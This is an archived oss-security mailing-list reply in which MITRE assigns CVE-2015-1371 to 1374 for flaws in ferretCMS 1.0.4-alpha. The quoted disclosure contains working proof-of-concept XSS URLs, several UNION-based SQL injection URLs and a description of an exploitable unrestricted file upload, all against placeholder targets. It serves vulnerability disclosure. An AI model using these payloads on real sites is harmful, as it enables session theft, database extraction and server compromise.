Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 27 Jan 2015 10:37:48 -0500 (EST)
From: cve-assign@...re.org
To: Steffen Rösemann <steffen.roesemann1986@...il.com>
cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple
 reflecting/stored XSS- and SQLi-vulnerabilities, unrestricted file upload


> I found multiple reflecting/stored XSS- and SQLi-vulnerabilities as well as
> an unrestricted file upload in the CMS ferretCMS v.1.0.4 which is currently
> in the alpha development stage.
>
> ============
> Reflecting XSS
> ============
>
> http://
> {TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
>
> ============
> Stored XSS
> ============
>
> 1.
> via login-form of the administrative backend, input field for username:
>
> http://{TARGET}/admin.php
>
> executed here in the logevent functionality in the backend:
>
> http://{TARGET}/admin.php?type=log&action=read
>
> 2.
>
> via the new blog-post form, input field for pagetitle:
>
> http://{TARGET}/admin.php?type=page&action=insert&p=
>
> executed, for example, here:
>
> http://{TARGET}/admin.php?type=page&action=read


Use CVE-2015-1373.


> ============
> SQLi
> ============
>
> http://
> {TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
>
> http://
> {TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
>
> http://
> {TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
>
> http://
> {TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
>
> http://
> {TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
>
> http://
> {TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
>
> http://
> {TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+

Use CVE-2015-1372.

> ==================
> Unrestricted file upload
> ==================
>
> An administrator has the opportunity to upload arbitrary files via a form
> located here on a common ferretCMS installation:
>
> http://{TARGET}/admin.php?type=uploader&action=upload
>
> As these files aren't renamed and stored in the following location, any
> unauthenticated user is able to read/execute those files, too:
>
> http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE}

Use CVE-2015-1371.


Use CVE-2015-1374 for the underlying CSRF that makes the XSS, SQLi, and 
file-upload attacks accessible to non-administrators.

> Could you please assign a CVE-ID / CVE-IDs for these issues.
>
> Thank you very much!
>
> Greetings.
>
> Steffen Rösemann
>
> References:
>
> [1] https://github.com/JRogaishio/ferretCMS
> [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
> [3] https://github.com/JRogaishio/ferretCMS/issues/63
> [4] https://github.com/sroesemann/ferretCMS
> [5] http://seclists.org/fulldisclosure/2015/Jan/98
> [6]
> http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html
>

---

CVE assignment team, MITRE CVE Numbering Authority M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ